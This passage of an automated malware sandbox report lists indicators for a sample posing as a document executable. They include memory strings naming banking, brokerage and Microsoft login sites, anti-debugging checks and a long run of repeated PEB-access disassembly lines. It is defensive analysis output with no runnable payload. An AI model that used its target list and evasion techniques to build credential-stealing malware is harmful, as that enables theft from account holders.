            Source: 6222f67M.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 6222f67M.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: jEsBIhfnof.exe, 00000006.00000002.4509189886.000000000141F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
            Source: 6222f67M.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 6222f67M.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 6222f67M.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 6222f67M.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: schtasks.exe, 00000004.00000002.4508662469.0000000000763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 6222f67M.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 6222f67M.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 6222f67M.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 6222f67M.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 6222f67M.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 6222f67M.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 6222f67M.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 6222f67M.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 6222f67M.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 6222f67M.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 6222f67M.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 6222f67M.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 6222f67M.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeAPI call chain: ExitProcess graph end nodegraph_0-84837
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeAPI call chain: ExitProcess graph end nodegraph_0-84916
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004171B3 LdrLoadDll,2_2_004171B3
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_03F95530 mov eax, dword ptr fs:[00000030h]0_2_03F95530
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_03F954D0 mov eax, dword ptr fs:[00000030h]0_2_03F954D0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_03F93EC0 mov eax, dword ptr fs:[00000030h]0_2_03F93EC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]2_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h]2_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]2_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h]2_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h]2_2_03C0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]2_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
